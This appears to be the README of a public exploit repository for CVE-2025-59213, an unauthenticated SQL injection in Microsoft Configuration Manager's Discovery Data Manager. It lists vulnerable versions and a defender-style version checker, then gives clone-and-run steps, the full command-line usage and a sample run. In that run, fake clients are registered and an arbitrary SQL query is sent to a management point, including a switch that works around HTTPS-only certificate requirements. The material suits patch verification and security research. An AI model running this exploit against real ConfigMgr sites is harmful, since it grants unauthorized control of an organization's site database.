Microsoft Configuration Manager (ConfigMgr / SCCM) 2503 Unauthenticated SQL injection (CVE-2025-59213) exploit
This script exploits CVE-2025-59213, a SQL injection in the Discovery Data Manager (DDM) that lets an unauthenticated attacker with network access to a Management Point execute arbitrary SQL queries on the site database. The flaw is in the DuplicateAMTMachineRecord method, where the unescaped Hardware_ID0 field is handled improperly while two clients with conflicting hardware IDs are merged.
When KB34503790 is missing, all the following Microsoft Configuration Manager versions are vulnerable:
- < 2503 (5.00.9135.1008)
- < 2409 (5.00.9132.1029)
- < 2403 (5.00.9128.1035)
- <= 2303 (*)
- In some cases, when the management point is configured with HTTPS Only communication mode, a PKI certificate is required to perform mutual TLS authentication against the vulnerable HTTP service. Any certificate issued by the internal PKI with the Client Authentication purpose will work.
- If you don't have a certificate, use the --altauth switch (more information here).
- The exploit requires registering two fake clients, which the script automatically deletes upon a successful SQL injection unless the --no-clean switch is used or a patch prevents the cleanup from triggering.
- Because the injection is asynchronous, time-based payloads are ineffective: there is no direct correlation between query execution and response time.
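As an added example (not code from the repository), the version list above turned into a check a defender can run against a site's reported version string. The mapping of build numbers 9135, 9132 and 9128 to the 2503, 2409 and 2403 branches is taken from that list; treating any build older than 2403 as vulnerable and any newer build as "not covered" are assumptions of this script.

```python
import re
from typing import NamedTuple, Optional

# Fixed builds named in this README, keyed by the build number that
# identifies each current-branch release (version format 5.00.<build>.<revision>).
FIXED_BUILDS = {
    9135: (1008, "2503"),  # 2503 is fixed from 5.00.9135.1008
    9132: (1029, "2409"),  # 2409 is fixed from 5.00.9132.1029
    9128: (1035, "2403"),  # 2403 is fixed from 5.00.9128.1035
}
OLDEST_LISTED_BUILD = min(FIXED_BUILDS)  # 9128, i.e. the 2403 branch


class VersionCheck(NamedTuple):
    vulnerable: Optional[bool]  # None when the README's list does not cover the build
    reason: str


def parse_version(version: str) -> tuple:
    """Split a site version such as '5.00.9135.1008' into four integers."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"not a ConfigMgr site version: {version!r}")
    return tuple(int(part) for part in m.groups())


def check_site_version(version: str) -> VersionCheck:
    """Decide, from the README's version list, whether a site is still vulnerable."""
    major, minor, build, revision = parse_version(version)
    if (major, minor) != (5, 0):
        raise ValueError(f"unexpected product version {major}.{minor:02d}")
    if build in FIXED_BUILDS:
        fixed_revision, branch = FIXED_BUILDS[build]
        fixed = f"5.00.{build}.{fixed_revision}"
        if revision < fixed_revision:
            return VersionCheck(True, f"{branch} below fixed build {fixed}: KB34503790 missing")
        return VersionCheck(False, f"{branch} at or above fixed build {fixed}")
    if build < OLDEST_LISTED_BUILD:
        # Assumption: branches older than 2403 (2303 and earlier) have no fix listed.
        return VersionCheck(True, "branch older than 2403, no fix listed: treat as vulnerable")
    return VersionCheck(None, "build not covered by the version list in this README")


if __name__ == "__main__":
    # Constructed sample versions, not values observed on a real site.
    for v in ("5.00.9135.1007", "5.00.9135.1008", "5.00.9128.1035", "5.00.9106.1000"):
        print(v, check_site_version(v))
```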
Install it by cloning the repository and installing the dependencies:
$ git clone https://github.com/synacktiv/CVE-2025-59213
$ cd CVE-2025-59213
$ python3 -m venv .venv && source .venv/bin/activate
$ python3 -m pip install -r requirements.txt
$ python3 CVE-2025-59213.py -h
usage: CVE-2025-59213.py [-h] -t TARGET [-sk SIGKEY] [-k KEY] [-c CERT] [-v] -cn CLIENT_NAME [-rs REGISTRATION_SLEEP] [-a] -sql SQL [-nc]
CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection
options:
-h, --help show this help message and exit
-t, --target TARGET Target (http://sccm-mp.local/)
-sk, --sigkey SIGKEY SMS signature key (automatically generated if omitted)
-k, --key KEY Private key file for mTLS
-c, --cert CERT Certificate file for mTLS
-v, --verbose Verbose output, print requests
-cn, --client-name CLIENT_NAME
Name of the client that will be created in SCCM
-rs, --registration-sleep REGISTRATION_SLEEP
The amount of time, in seconds, that should be waited after registrating a new device (10 seconds by default)
-a, --altauth Use the MP's alternate authentication endpoint
-sql SQL Query to execute through the SQL injection
-nc, --no-clean Do not automatically clean the registred devices
$ python3 ./CVE-2025-59213.py -t https://cmc.corp.local --altauth -cn FAKE_CLIENT_NAME -sql 'select 1'
[+] Generated new signing key, saved to /tmp/sccm_poc.key
[+] CcmMessage : ID={D731ED0A-4474-497D-A191-D8948E17ECBF}
[+] Got SMSID = GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F for new client FAKE_CLIENT_NAME
[+] CcmMessage : ID={23EEE9B8-7971-4560-9D18-9328C5DF0C2E}
[+] Got SMSID = GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69 for new client FAKE_CLIENT_NAME
[+] Sending DDR report: SMSID=GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F OLDSMSID=GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69
[+] CcmMessage : ID={88B6BEBD-1F99-4BD2-8786-6BD3C6CFF299}
[+] CcmMessage : adding clientauth
[+] CcmMessage : adding attachment
[+] DDR report sent successfully